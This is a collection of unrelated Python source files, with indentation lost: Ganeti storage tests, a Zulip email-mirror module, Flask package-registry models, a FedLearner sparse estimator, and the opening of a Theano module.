backend._ApplyStorageInfoFunction(
storage_type, self._STORAGE_KEY, self._SOME_ARGS)
self.mock_storage_fn.assert_called_with(self._STORAGE_KEY, self._SOME_ARGS)
backend._STORAGE_TYPE_INFO_FN = info_fn_orig
def testApplyInValidStorageType(self):
storage_type = "invalid_storage_type"
info_fn_orig = backend._STORAGE_TYPE_INFO_FN
backend._STORAGE_TYPE_INFO_FN = {}
self.assertRaises(KeyError, backend._ApplyStorageInfoFunction,
storage_type, self._STORAGE_KEY, self._SOME_ARGS)
backend._STORAGE_TYPE_INFO_FN = info_fn_orig
def testApplyNotImplementedStorageType(self):
storage_type = "not_implemented_storage_type"
info_fn_orig = backend._STORAGE_TYPE_INFO_FN
backend._STORAGE_TYPE_INFO_FN = {storage_type: None}
self.assertRaises(NotImplementedError,
backend._ApplyStorageInfoFunction,
storage_type, self._STORAGE_KEY, self._SOME_ARGS)
backend._STORAGE_TYPE_INFO_FN = info_fn_orig
class TestGetLvmVgSpaceInfo(unittest.TestCase):
def testValid(self):
path = "somepath"
excl_stor = True
orig_fn = backend._GetVgInfo
backend._GetVgInfo = mock.Mock()
backend._GetLvmVgSpaceInfo(path, [excl_stor])
backend._GetVgInfo.assert_called_with(path, excl_stor)
backend._GetVgInfo = orig_fn
def testNoExclStorageNotBool(self):
path = "somepath"
excl_stor = "123"
self.assertRaises(errors.ProgrammerError, backend._GetLvmVgSpaceInfo,
path, [excl_stor])
def testNoExclStorageNotInList(self):
path = "somepath"
excl_stor = "123"
self.assertRaises(errors.ProgrammerError, backend._GetLvmVgSpaceInfo,
path, excl_stor)
class TestGetLvmPvSpaceInfo(unittest.TestCase):
def testValid(self):
path = "somepath"
excl_stor = True
orig_fn = backend._GetVgSpindlesInfo
backend._GetVgSpindlesInfo = mock.Mock()
backend._GetLvmPvSpaceInfo(path, [excl_stor])
backend._GetVgSpindlesInfo.assert_called_with(path, excl_stor)
backend._GetVgSpindlesInfo = orig_fn
class TestCheckStorageParams(unittest.TestCase):
def testParamsNone(self):
self.assertRaises(errors.ProgrammerError, backend._CheckStorageParams,
None, NotImplemented)
def testParamsWrongType(self):
self.assertRaises(errors.ProgrammerError, backend._CheckStorageParams,
"string", NotImplemented)
def testParamsEmpty(self):
backend._CheckStorageParams([], 0)
def testParamsValidNumber(self):
backend._CheckStorageParams(["a", True], 2)
def testParamsInvalidNumber(self):
self.assertRaises(errors.ProgrammerError, backend._CheckStorageParams,
["b", False], 3)
class TestGetVgSpindlesInfo(unittest.TestCase):
def setUp(self):
self.vg_free = 13
self.vg_size = 31
self.mock_fn = mock.Mock(return_value=(self.vg_free, self.vg_size))
def testValidInput(self):
name = "myvg"
excl_stor = True
result = backend._GetVgSpindlesInfo(name, excl_stor, info_fn=self.mock_fn)
self.mock_fn.assert_called_with(name)
self.assertEqual(name, result["name"])
self.assertEqual(constants.ST_LVM_PV, result["type"])
self.assertEqual(self.vg_free, result["storage_free"])
self.assertEqual(self.vg_size, result["storage_size"])
def testNoExclStor(self):
name = "myvg"
excl_stor = False
result = backend._GetVgSpindlesInfo(name, excl_stor, info_fn=self.mock_fn)
self.mock_fn.assert_not_called()
self.assertEqual(name, result["name"])
self.assertEqual(constants.ST_LVM_PV, result["type"])
self.assertEqual(0, result["storage_free"])
self.assertEqual(0, result["storage_size"])
class TestGetVgInfo(unittest.TestCase):
def testValidInput(self):
self.vg_free = 13
self.vg_size = 31
self.mock_fn = mock.Mock(return_value=[(self.vg_free, self.vg_size)])
name = "myvg"
excl_stor = True
result = backend._GetVgInfo(name, excl_stor, info_fn=self.mock_fn)
self.mock_fn.assert_called_with([name], excl_stor)
self.assertEqual(name, result["name"])
self.assertEqual(constants.ST_LVM_VG, result["type"])
self.assertEqual(self.vg_free, result["storage_free"])
self.assertEqual(self.vg_size, result["storage_size"])
def testNoExclStor(self):
name = "myvg"
excl_stor = True
self.mock_fn = mock.Mock(return_value=None)
result = backend._GetVgInfo(name, excl_stor, info_fn=self.mock_fn)
self.mock_fn.assert_called_with([name], excl_stor)
self.assertEqual(name, result["name"])
self.assertEqual(constants.ST_LVM_VG, result["type"])
self.assertEqual(None, result["storage_free"])
self.assertEqual(None, result["storage_size"])
class TestGetNodeInfo(unittest.TestCase):
_SOME_RESULT = None
def testApplyStorageInfoFunction(self):
orig_fn = backend._ApplyStorageInfoFunction
backend._ApplyStorageInfoFunction = mock.Mock(
return_value=self._SOME_RESULT)
storage_units = [(st, st + "_key", [st + "_params"]) for st in
constants.STORAGE_TYPES]
backend.GetNodeInfo(storage_units, None)
call_args_list = backend._ApplyStorageInfoFunction.call_args_list
self.assertEqual(len(constants.STORAGE_TYPES), len(call_args_list))
for call in call_args_list:
storage_type, storage_key, storage_params = call[0]
self.assertEqual(storage_type + "_key", storage_key)
self.assertEqual([storage_type + "_params"], storage_params)
self.assertTrue(storage_type in constants.STORAGE_TYPES)
backend._ApplyStorageInfoFunction = orig_fn
class TestSpaceReportingConstants(unittest.TestCase):
"""Ensures consistency between STS_REPORT and backend.
These tests ensure that the constant 'STS_REPORT' is consistent
with the implementation of invoking space reporting functions
in backend.py. Once space reporting is available for all types,
the constant can be removed and these tests as well.
"""
def testAllReportingTypesHaveAReportingFunction(self):
for storage_type in constants.STS_REPORT:
self.assertTrue(backend._STORAGE_TYPE_INFO_FN[storage_type] is not None)
def testAllNotReportingTypesDontHaveFunction(self):
non_reporting_types = set(constants.STORAGE_TYPES)\
- set(constants.STS_REPORT)
for storage_type in non_reporting_types:
self.assertEqual(None, backend._STORAGE_TYPE_INFO_FN[storage_type])
if __name__ == "__main__":
testutils.GanetiTestProgram()
|
|
from __future__ import absolute_import
from typing import Any, Dict, Optional, Text
import logging
import re
from email.header import decode_header
import email.message as message
from django.conf import settings
from zerver.lib.actions import decode_email_address, get_email_gateway_message_string_from_address, \
internal_send_message
from zerver.lib.notifications import convert_html_to_markdown
from zerver.lib.redis_utils import get_redis_client
from zerver.lib.upload import upload_message_image
from zerver.lib.utils import generate_random_token
from zerver.lib.str_utils import force_text
from zerver.models import Stream, Recipient, get_user_profile_by_email, \
get_user_profile_by_id, get_display_recipient, get_recipient, \
Message, Realm, UserProfile
from six import binary_type
import six
import talon
from talon import quotations
talon.init()
logger = logging.getLogger(__name__)
def redact_stream(error_message):
# type: (Text) -> Text
domain = settings.EMAIL_GATEWAY_PATTERN.rsplit('@')[-1]
stream_match = re.search(u'\\b(.*?)@' + domain, error_message)
if stream_match:
stream_name = stream_match.groups()[0]
return error_message.replace(stream_name, "X" * len(stream_name))
return error_message
def report_to_zulip(error_message):
# type: (Text) -> None
if settings.ERROR_BOT is None:
return
error_bot = get_user_profile_by_email(settings.ERROR_BOT)
error_stream = Stream.objects.get(name="errors", realm=error_bot.realm)
send_zulip(settings.ERROR_BOT, error_stream, u"email mirror error",
u"""~~~\n%s\n~~~""" % (error_message,))
def log_and_report(email_message, error_message, debug_info):
# type: (message.Message, Text, Dict[str, Any]) -> None
scrubbed_error = u"Sender: %s\n%s" % (email_message.get("From"),
redact_stream(error_message))
if "to" in debug_info:
scrubbed_error = u"Stream: %s\n%s" % (redact_stream(debug_info["to"]),
scrubbed_error)
if "stream" in debug_info:
scrubbed_error = u"Realm: %s\n%s" % (debug_info["stream"].realm.domain,
scrubbed_error)
logger.error(scrubbed_error)
report_to_zulip(scrubbed_error)
# Temporary missed message addresses
redis_client = get_redis_client()
def missed_message_redis_key(token):
# type: (Text) -> Text
return 'missed_message:' + token
def is_missed_message_address(address):
# type: (Text) -> bool
msg_string = get_email_gateway_message_string_from_address(address)
return is_mm_32_format(msg_string)
def is_mm_32_format(msg_string):
# type: (Text) -> bool
'''
Missed message strings are formatted with a little "mm" prefix
followed by a randomly generated 32-character string.
'''
return msg_string.startswith('mm') and len(msg_string) == 34
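# e.g. is_mm_32_format('mm' + 'a' * 32) -> True, is_mm_32_format('mmtooshort') -> False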
def get_missed_message_token_from_address(address):
# type: (Text) -> Text
msg_string = get_email_gateway_message_string_from_address(address)
if msg_string is None:
raise ZulipEmailForwardError('Address not recognized by gateway.')
if not is_mm_32_format(msg_string):
raise ZulipEmailForwardError('Could not parse missed message address')
# strip off the 'mm' prefix before returning the token used to build the redis key
return msg_string[2:]
def create_missed_message_address(user_profile, message):
# type: (UserProfile, Message) -> Text
if settings.EMAIL_GATEWAY_PATTERN == '':
logging.warning("EMAIL_GATEWAY_PATTERN is an empty string, using "
"NOREPLY_EMAIL_ADDRESS in the 'from' field.")
return settings.NOREPLY_EMAIL_ADDRESS
if message.recipient.type == Recipient.PERSONAL:
# We need to reply to the sender so look up their personal recipient_id
recipient_id = get_recipient(Recipient.PERSONAL, message.sender_id).id
else:
recipient_id = message.recipient_id
data = {
'user_profile_id': user_profile.id,
'recipient_id': recipient_id,
'subject': message.subject,
}
while True:
token = generate_random_token(32)
key = missed_message_redis_key(token)
if redis_client.hsetnx(key, 'uses_left', 1):
break
with redis_client.pipeline() as pipeline:
pipeline.hmset(key, data)
pipeline.expire(key, 60 * 60 * 24 * 5)
pipeline.execute()
address = u'mm' + token
return settings.EMAIL_GATEWAY_PATTERN % (address,)
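# Sketch of the resulting state (illustrative): the redis hash at
# missed_message:<token> holds uses_left=1 plus user_profile_id, recipient_id
# and subject, expires after 5 days, and the address handed back is
# EMAIL_GATEWAY_PATTERN filled in with 'mm' + token.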
def mark_missed_message_address_as_used(address):
# type: (Text) -> None
token = get_missed_message_token_from_address(address)
key = missed_message_redis_key(token)
with redis_client.pipeline() as pipeline:
pipeline.hincrby(key, 'uses_left', -1)
pipeline.expire(key, 60 * 60 * 24 * 5)
new_value = pipeline.execute()[0]
if new_value < 0:
redis_client.delete(key)
raise ZulipEmailForwardError('Missed message address has already been used')
def send_to_missed_message_address(address, message):
# type: (Text, message.Message) -> None
token = get_missed_message_token_from_address(address)
key = missed_message_redis_key(token)
result = redis_client.hmget(key, 'user_profile_id', 'recipient_id', 'subject')
if not all(val is not None for val in result):
raise ZulipEmailForwardError('Missing missed message address data')
user_profile_id, recipient_id, subject = result
user_profile = get_user_profile_by_id(user_profile_id)
recipient = Recipient.objects.get(id=recipient_id)
display_recipient = get_display_recipient(recipient)
# get_display_recipient returns a string for stream recipients and a list
# of user dicts otherwise; normalize both cases to a comma-separated string.
if not isinstance(display_recipient, six.string_types):
recipient_str = ','.join([user['email'] for user in display_recipient])
else:
recipient_str = display_recipient
body = filter_footer(extract_body(message))
body += extract_and_upload_attachments(message, user_profile.realm)
if not body:
body = '(No email body)'
if recipient.type == Recipient.STREAM:
recipient_type_name = 'stream'
else:
recipient_type_name = 'private'
internal_send_message(user_profile.realm, user_profile.email,
recipient_type_name, recipient_str, subject, body)
logging.info("Successfully processed email from %s to %s" % (
user_profile.email, recipient_str))
## Sending the Zulip ##
class ZulipEmailForwardError(Exception):
pass
def send_zulip(sender, stream, topic, content):
# type: (Text, Stream, Text, Text) -> None
internal_send_message(
stream.realm,
sender,
"stream",
stream.name,
topic[:60],
content[:2000])
def valid_stream(stream_name, token):
# type: (Text, Text) -> bool
try:
stream = Stream.objects.get(email_token=token)
return stream.name.lower() == stream_name.lower()
except Stream.DoesNotExist:
return False
def get_message_part_by_type(message, content_type):
# type: (message.Message, Text) -> Text
charsets = message.get_charsets()
for idx, part in enumerate(message.walk()):
if part.get_content_type() == content_type:
content = part.get_payload(decode=True)
assert isinstance(content, binary_type)
if charsets[idx]:
text = content.decode(charsets[idx], errors="ignore")
return text
def extract_body(message):
# type: (message.Message) -> Text
# If the message contains a plaintext version of the body, use
# that.
plaintext_content = get_message_part_by_type(message, "text/plain")
if plaintext_content:
return quotations.extract_from_plain(plaintext_content)
# If we only have an HTML version, try to make that look nice.
html_content = get_message_part_by_type(message, "text/html")
if html_content:
html_content = quotations.extract_from_html(html_content)
return convert_html_to_markdown(html_content)
raise ZulipEmailForwardError("Unable to find plaintext or HTML message body")
def filter_footer(text):
# type: (Text) -> Text
# Try to filter out obvious footers.
possible_footers = [line for line in text.split("\n") if line.strip().startswith("--")]
if len(possible_footers) != 1:
# Be conservative and don't try to scrub content if there
# isn't a trivial footer structure.
return text
return text.partition("--")[0].strip()
def extract_and_upload_attachments(message, realm):
# type: (message.Message, Realm) -> Text
user_profile = get_user_profile_by_email(settings.EMAIL_GATEWAY_BOT)
attachment_links = []
payload = message.get_payload()
if not isinstance(payload, list):
# This is not a multipart message, so it can't contain attachments.
return ""
for part in payload:
content_type = part.get_content_type()
filename = part.get_filename()
if filename:
attachment = part.get_payload(decode=True)
if isinstance(attachment, binary_type):
s3_url = upload_message_image(filename, len(attachment), content_type,
attachment,
user_profile,
target_realm=realm)
formatted_link = u"[%s](%s)" % (filename, s3_url)
attachment_links.append(formatted_link)
else:
logger.warning("Payload is not bytes (invalid attachment %s in message from %s)." %
(filename, message.get("From")))
return u"\n".join(attachment_links)
def extract_and_validate(email):
# type: (Text) -> Stream
try:
stream_name, token = decode_email_address(email)
except (TypeError, ValueError):
raise ZulipEmailForwardError("Malformed email recipient " + email)
if not valid_stream(stream_name, token):
raise ZulipEmailForwardError("Bad stream token from email recipient " + email)
return Stream.objects.get(email_token=token)
def find_emailgateway_recipient(message):
# type: (message.Message) -> Text
# We can't use Delivered-To; if there is an X-Gm-Original-To
# header it is more accurate, so try to find the most accurate
# recipient list in descending priority order
recipient_headers = ["X-Gm-Original-To", "Delivered-To", "To"]
recipients = [] # type: List[Text]
for recipient_header in recipient_headers:
r = message.get_all(recipient_header, None)
if r:
recipients = r
break
pattern_parts = [re.escape(part) for part in settings.EMAIL_GATEWAY_PATTERN.split('%s')]
match_email_re = re.compile(".*?".join(pattern_parts))
for recipient_email in recipients:
if match_email_re.match(recipient_email):
return recipient_email
raise ZulipEmailForwardError("Missing recipient in mirror email")
def process_stream_message(to, subject, message, debug_info):
# type: (Text, Text, message.Message, Dict[str, Any]) -> None
stream = extract_and_validate(to)
body = filter_footer(extract_body(message))
body += extract_and_upload_attachments(message, stream.realm)
debug_info["stream"] = stream
send_zulip(settings.EMAIL_GATEWAY_BOT, stream, subject, body)
logging.info("Successfully processed email to %s (%s)" % (
stream.name, stream.realm.domain))
def process_missed_message(to, message, pre_checked):
# type: (Text, message.Message, bool) -> None
if not pre_checked:
mark_missed_message_address_as_used(to)
send_to_missed_message_address(to, message)
def process_message(message, rcpt_to=None, pre_checked=False):
# type: (message.Message, Optional[Text], bool) -> None
subject_header = message.get("Subject", "(no subject)")
encoded_subject, encoding = decode_header(subject_header)[0]
if encoding is None:
subject = force_text(encoded_subject) # encoded_subject has type str when encoding is None
else:
try:
subject = encoded_subject.decode(encoding)
except (UnicodeDecodeError, LookupError):
subject = u"(unreadable subject)"
debug_info = {}
try:
if rcpt_to is not None:
to = rcpt_to
else:
to = find_emailgateway_recipient(message)
debug_info["to"] = to
if is_missed_message_address(to):
process_missed_message(to, message, pre_checked)
else:
process_stream_message(to, subject, message, debug_info)
except ZulipEmailForwardError as e:
# TODO: notify sender of error, retry if appropriate.
log_and_report(message, str(e), debug_info)
|
|
from app import db, cache
from utils import cache_timeout
import datetime
dependencies = db.Table(
'dependencies',
db.Column('dependency_id', db.Integer, db.ForeignKey('dependency.id')),
db.Column('package_id', db.Integer, db.ForeignKey('package.id'))
)
keywords = db.Table(
'keywords',
db.Column('keyword_id', db.Integer, db.ForeignKey('keyword.id')),
db.Column('package_id', db.Integer, db.ForeignKey('package.id'))
)
class Package(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255), unique=True, nullable=False)
author = db.Column(db.String(50))
url = db.Column(db.String(140))
description = db.Column(db.Text())
stars = db.Column(db.Integer, default=0)
downloads = db.relationship('Downloads', backref='package', lazy='dynamic')
version = db.relationship('Version', backref='package', lazy='dynamic')
license_id = db.Column(db.Integer, db.ForeignKey('license.id'), nullable=True)
dependencies = db.relationship('Dependency', secondary=dependencies,
lazy='dynamic', backref=db.backref('packages', lazy='dynamic'))
keywords = db.relationship('Keyword', secondary=keywords,
lazy='dynamic', backref=db.backref('packages', lazy='dynamic'))
def __repr__(self):
return 'Package: %s' % self.name
@classmethod
def get_count(self):
return Package.query.count()
@classmethod
def get_package(self, name):
return self.query.filter(self.name == name).first()
@cache_timeout
@cache.memoize()
def get_json(self):
json_data = dict()
# add the following attributes to the dict
for label in ['name', 'author', 'url', 'description', 'stars']:
json_data[label] = getattr(self, label)
version_obj = self.version.order_by(Version.id.desc()).first()
version_data = version_obj.get_json() if version_obj is not None else {}
downloads_data = Downloads.get_json(self.downloads)
deps_models = self.dependencies.all()
keys_models = self.keywords.all()
json_data['version'] = version_data
json_data['downloads'] = downloads_data
json_data['downloads_list'] = Downloads.get_list(self.downloads)
json_data['license'] = {} if self.license is None else self.license.get_json()
json_data['dependencies'] = [item.get_json() for item in deps_models]
json_data['keywords'] = [item.get_json() for item in keys_models]
return json_data
class Version(db.Model):
id = db.Column(db.Integer, primary_key=True)
number = db.Column(db.String(50), nullable=False)
date = db.Column(db.DateTime, default=datetime.date.today, nullable=False)
package_id = db.Column(db.Integer, db.ForeignKey('package.id'), nullable=False)
def __repr__(self):
return 'Ver: {} on {}'.format(self.number, self.date)
def get_json(self):
json_data = dict()
json_data['number'] = self.number
json_data['date'] = self.date.isoformat()
return json_data
class License(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), nullable=False)
url = db.Column(db.String(255))
package = db.relationship('Package', backref='license', lazy='dynamic')
def __repr__(self):
return 'Lic: {} at {}'.format(self.name, self.url)
def get_json(self):
json_data = dict()
json_data['name'] = self.name
json_data['url'] = self.url
return json_data
class Dependency(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), nullable=False)
url = db.Column(db.String(255))
def __repr__(self):
return 'Dep: {} at {}'.format(self.name, self.url)
def get_json(self):
json_data = dict()
json_data['name'] = self.name
json_data['url'] = self.url
return json_data
class Keyword(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), nullable=False)
def __repr__(self):
return 'Key: {} '.format(self.name)
def get_json(self):
return self.name
class DbFlags(db.Model):
id = db.Column(db.Integer, primary_key=True)
date = db.Column(db.DateTime, default=datetime.date.today, nullable=False)
flag = db.Column(db.Boolean, nullable=False)
def __repr__(self):
return 'DbFlags: {} {}'.format(self.date, self.flag)
@classmethod
def get_update_time(self):
return self.query.filter(self.id == 1).first().date
class Downloads(db.Model):
id = db.Column(db.Integer, primary_key=True)
downloads = db.Column(db.Integer, nullable=False)
date = db.Column(db.DateTime, default=datetime.date.today, nullable=False)
package_id = db.Column(db.Integer, db.ForeignKey('package.id'), nullable=False)
@classmethod
def nearest_last_entry(self, time):
last_date = self.query.order_by(False).first().date
while self.query.filter(self.date == time).count() <= 0:
if last_date >= time:
time = last_date
break
time -= datetime.timedelta(days=1)
return time
@classmethod
def __count_downloads(self, entries):
count = 0
for entry in entries:
count += entry.downloads
return count
# period should be a datetime.timedelta
@classmethod
def get_overall_downloads_count(self, period):
current_time = DbFlags.get_update_time()
current_entries = self.query.filter(self.date == current_time).all()
old_time = self.nearest_last_entry(current_time - period)
old_entries = self.query.filter(self.date == old_time).all()
current_downloads = self.__count_downloads(current_entries)
old_downloads = self.__count_downloads(old_entries)
return current_downloads - old_downloads
@classmethod
def get_package_downloads_count(self, query, period):
current_time = query.first().date
time = current_time - period
last_date = query.order_by(False).first().date
while query.filter(self.date == time).first() is None:
if last_date >= time:
time = last_date
break
time -= datetime.timedelta(days=1)
count = query.filter(self.date == time).first().downloads
return count
@classmethod
def get_json(self, query):
json_data = dict()
query = query.order_by(self.id.desc())
json_data['total'] = query.first().downloads
count = self.get_package_downloads_count(query, datetime.timedelta(days=30))
json_data['month'] = json_data['total'] - count
count = self.get_package_downloads_count(query, datetime.timedelta(days=7))
json_data['week'] = json_data['total'] - count
count = self.get_package_downloads_count(query, datetime.timedelta(days=1))
json_data['day'] = json_data['total'] - count
return json_data
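# Illustrative numbers: if the latest entry has downloads=500 and the entry
# nearest to 30 days ago had downloads=420, get_json reports month=80, i.e.
# downloads gained over that period; week and day are computed the same way.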
@classmethod
def get_list(self, query):
models = query.order_by(self.id.desc()).limit(50).all()
return [item.downloads for item in models]
|
|
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
# pylint: disable=protected-access
import tensorflow.compat.v1 as tf
from tensorflow.contrib import graph_editor as ge
from fedlearner.trainer import embedding
from fedlearner.trainer import estimator
from fedlearner.trainer import feature
from fedlearner.trainer import operator
from fedlearner.trainer import utils
class ConfigRunError(Exception):
pass
class SparseFLModel(estimator.FLModel):
def __init__(self, role, bridge, example_ids, exporting=False,
config_run=True,
bias_tensor=None, vec_tensor=None,
bias_embedding=None, vec_embedding=None,
feature_columns=None):
super(SparseFLModel, self).__init__(role,
bridge, example_ids, exporting)
self._config_run = config_run
self._num_shards = 1
if config_run:
self._bias_tensor = tf.placeholder(tf.float32, shape=[None, None])
self._vec_tensor = tf.placeholder(tf.float32, shape=[None, None])
else:
self._bias_tensor = bias_tensor
self._vec_tensor = vec_tensor
self._bias_embedding = bias_embedding
self._vec_embedding = vec_embedding
self._feature_columns = feature_columns
self._frozen = False
self._slot_ids = []
self._feature_slots = {}
self._feature_column_v1s = {}
self._use_fid_v2 = False
self._num_embedding_groups = 3
def add_feature_slot(self, *args, **kwargs):
assert not self._frozen, "Cannot modify model after finalization"
fs = feature.FeatureSlot(*args, **kwargs)
if self._use_fid_v2:
assert 0 <= fs.slot_id < utils.MAX_SLOTS_v2, \
"Invalid slot id %d"%fs.slot_id
else:
assert 0 <= fs.slot_id < utils.MAX_SLOTS, \
"Invalid slot id %d"%fs.slot_id
self._slot_ids.append(fs.slot_id)
self._feature_slots[fs.slot_id] = fs
return fs
def add_feature_column(self, *args, **kwargs):
assert not self._frozen, "Cannot modify model after finalization"
fc = feature.FeatureColumnV1(*args, **kwargs)
slot_id = fc.feature_slot.slot_id
assert slot_id in self._feature_slots and \
self._feature_slots[slot_id] is fc.feature_slot, \
"FeatureSlot with id %d must be added to Model first"%slot_id
assert slot_id not in self._feature_column_v1s, \
"Only one FeatureColumnV1 can be created for each slot"
self._feature_column_v1s[slot_id] = fc
return fc
def set_use_fid_v2(self, use_fid_v2):
self._use_fid_v2 = use_fid_v2
def get_bias(self):
return self._bias_tensor
def get_vec(self):
return self._vec_tensor
def _get_bias_slot_configs(self):
if not self._config_run:
return self._bias_embedding.config if self._bias_embedding else None
slot_list = []
fs_map = {}
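# Each slot_list entry is (slot_id, dim, hash_table_size, key), where key
# identifies an (initializer, optimizer) pair; slots sharing a key are
# looked up together via bias_config['weight_group_keys'] below.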
for slot_id in self._slot_ids:
fs = self._feature_slots[slot_id]
key = (id(fs._bias_initializer), id(fs._bias_optimizer))
fs_map[key] = fs
slot_list.append((fs.slot_id, 1, fs.hash_table_size, key))
if not slot_list:
return None
bias_config = utils._compute_slot_config(slot_list, 1,
self._use_fid_v2)
bias_config['name'] = 'bias'
bias_config['slot_list'] = slot_list
bias_config['initializers'] = [fs_map[i]._bias_initializer
for i in bias_config['weight_group_keys']]
bias_config['optimizers'] = [fs_map[i]._bias_optimizer
for i in bias_config['weight_group_keys']]
bias_config['use_fid_v2'] = self._use_fid_v2
return bias_config
def _get_vec_slot_configs(self):
if not self._config_run:
return self._vec_embedding.config if self._vec_embedding else None
slot_list = []
fs_map = {}
for slot_id in self._slot_ids:
if slot_id not in self._feature_column_v1s:
continue
fc = self._feature_column_v1s[slot_id]
fs = fc.feature_slot
if fc.feature_slot.dim > 1:
key = (id(fs._vec_initializer), id(fs._vec_optimizer))
fs_map[key] = fs
slot_list.append((slot_id, fs.dim - 1, fs.hash_table_size, key))
if not slot_list:
return None
vec_config = utils._compute_slot_config(slot_list,
self._num_embedding_groups,
self._use_fid_v2)
vec_config['name'] = 'vec'
vec_config['slot_list'] = slot_list
vec_config['initializers'] = [fs_map[i]._vec_initializer
for i in vec_config['weight_group_keys']]
vec_config['optimizers'] = [fs_map[i]._vec_optimizer
for i in vec_config['weight_group_keys']]
vec_config['use_fid_v2'] = self._use_fid_v2
return vec_config
def get_feature_columns(self):
return self._feature_column_v1s
def freeze_slots(self, features):
assert not self._frozen, "Already finalized"
if self._config_run:
raise ConfigRunError()
self._sparse_v2opt = {}
bias_config = self._get_bias_slot_configs()
if bias_config:
bias_weights = self._bias_embedding.weights
for i, opt in enumerate(bias_config['optimizers']):
for j in range(self._num_shards):
self._sparse_v2opt[bias_weights[i][j]] = opt
vec_config = self._get_vec_slot_configs()
if vec_config:
vec_weights = self._vec_embedding.weights
for i, opt in enumerate(vec_config['optimizers']):
for j in range(self._num_shards):
self._sparse_v2opt[vec_weights[i][j]] = opt
placeholders = []
dims = []
for slot_id, _, _, _ in vec_config['slot_list']:
fc = self._feature_column_v1s[slot_id]
for sslice in fc.feature_slot.feature_slices:
dims.append(sslice.len)
placeholders.append(fc.get_vector(sslice))
vec_split = tf.split(self._vec_tensor, dims, axis=1)
ge.swap_ts(vec_split, placeholders)
for slot in self._feature_slots.values():
slot._frozen = True
self._frozen = True
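# Note on the two-phase flow implemented below: SparseFLEstimator first runs
# model_fn on a throwaway SparseFLModel with config_run=True; freeze_slots then
# raises ConfigRunError, which _set_model_configs catches in order to collect
# the bias/vec slot configs. A second SparseFLModel with config_run=False and
# real embedding tensors is built in _get_model_spec for the actual run.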
class SparseFLEstimator(estimator.FLEstimator):
def __init__(self,
cluster_server,
trainer_master,
bridge,
role,
model_fn,
is_chief=False):
super(SparseFLEstimator, self).__init__(
cluster_server, trainer_master, bridge, role, model_fn, is_chief)
self._bias_slot_configs = None
self._vec_slot_configs = None
self._slot_configs = None
try:
ps_indices = cluster_server.cluster_spec.task_indices('ps')
except ValueError:
ps_indices = None
finally:
self._embedding_devices = [None,] if not ps_indices else \
['/job:ps/task:%d'%i for i in ps_indices]
self._num_shards = len(self._embedding_devices)
def _preprocess_fids(self, fids, configs):
if fids.indices.shape.rank == 2:
fids = tf.IndexedSlices(indices=fids.indices[:, 0],
values=fids.values,
dense_shape=fids.dense_shape)
features = {}
for config in configs:
features.update(operator._multidevice_preprocess_fids(
fids, config, num_shards=self._num_shards))
return features
def _set_model_configs(self, mode): #features, labels, mode):
with tf.Graph().as_default() as g:
M = SparseFLModel(self._role,
self._bridge,
None, #features['example_id'],
config_run=True)
try:
self._model_fn(M, None, None, mode) # features, labels, mode)
except ConfigRunError:
self._bias_slot_configs = M._get_bias_slot_configs()
self._vec_slot_configs = M._get_vec_slot_configs()
self._feature_columns = M.get_feature_columns()
self._slot_configs = [self._bias_slot_configs,
self._vec_slot_configs]
return self._slot_configs
raise UserWarning("Failed to get model config. Did you forget to call \
freeze_slots in model_fn?")
def _get_features_and_labels_from_input_fn(self, input_fn, mode):
slot_configs = self._set_model_configs(mode) # features, labels, mode)
def input_fn_wrapper(*args, **kwargs):
dataset = input_fn(self._bridge, self._trainer_master)
def mapper(features, *args):
features.update(self._preprocess_fids(features.pop('fids'),
slot_configs))
return (features,) + args if args else features
dataset = dataset.map(
mapper, num_parallel_calls=tf.data.experimental.AUTOTUNE)
dataset = dataset.prefetch(2)
return dataset
return super(SparseFLEstimator, self
)._get_features_and_labels_from_input_fn(input_fn_wrapper, mode)
def _get_model_spec(self, features, labels, mode):
features = features.copy()
if mode == tf.estimator.ModeKeys.PREDICT:
fids = tf.IndexedSlices(
indices=features.pop('fids_indices'),
values=features.pop('fids_values'),
dense_shape=features.pop('fids_dense_shape'))
features.update(self._preprocess_fids(
fids, self._slot_configs))
bias_embedding = embedding.Embedding(self._bias_slot_configs,
devices=self._embedding_devices)
bias_tensor = bias_embedding.lookup(features)
if self._vec_slot_configs is not None:
vec_embedding = embedding.Embedding(self._vec_slot_configs,
devices=self._embedding_devices)
vec_tensor = vec_embedding.lookup(features)
else:
vec_embedding = None
vec_tensor = None
model = SparseFLModel(self._role, self._bridge,
features.get('example_id', None),
config_run=False,
bias_tensor=bias_tensor,
bias_embedding=bias_embedding,
vec_tensor=vec_tensor,
vec_embedding=vec_embedding,
feature_columns=self._feature_columns)
spec = self._model_fn(model, features, labels, mode)
assert model._frozen, "Please finalize model in model_fn"
return spec, model
|
|
"""WRITEME"""
from __future__ import print_function
from copy import copy, deepcopy
from sys import getsizeof
import sys
import traceback
import numpy
import theano
from theano.compat import izip
from six import reraise
from six.moves import StringIO
from theano.gof import utils
from theano.gof import graph
from theano.gof.type import Type
from .utils import undef
__excepthook = sys.excepthook
def log_thunk_trace(value, f=sys.stderr):
"""Log Theano's diagnostic stack trace for an exception
raised by raise_with_op.
"""
# in future, consider accepting `write` as arg rather than file
# to support writing to a logger
def write(msg):
print("log_thunk_trace: %s" % msg.strip(), file=f)
if hasattr(value, '__thunk_trace__'):
trace2 = value.__thunk_trace__
write("There was a problem executing an Op.")
if trace2 is None:
write("Could not find where this Op was defined.")
write(" * You might have instantiated this Op "
"directly instead of using a constructor.")
write(" * The Op you constructed might have been"
" optimized. Try turning off optimizations.")
elif trace2:
write("Definition in: ")
for line in traceback.format_list(trace2):
write(line)
write("For the full definition stack trace set"
" the Theano flags traceback.limit to -1")
def thunk_hook(type, value, trace):
"""WRITEME
This function is meant to replace excepthook and do some
special work if the exception value has a __thunk_trace__
field. In that case, it retrieves the field, which should
contain a trace as returned by L{traceback.extract_stack},
and prints it out on L{stderr}.
The normal excepthook is then called.
:note: This hook is replaced by nosetests, so it does not run in nose tests.
"""
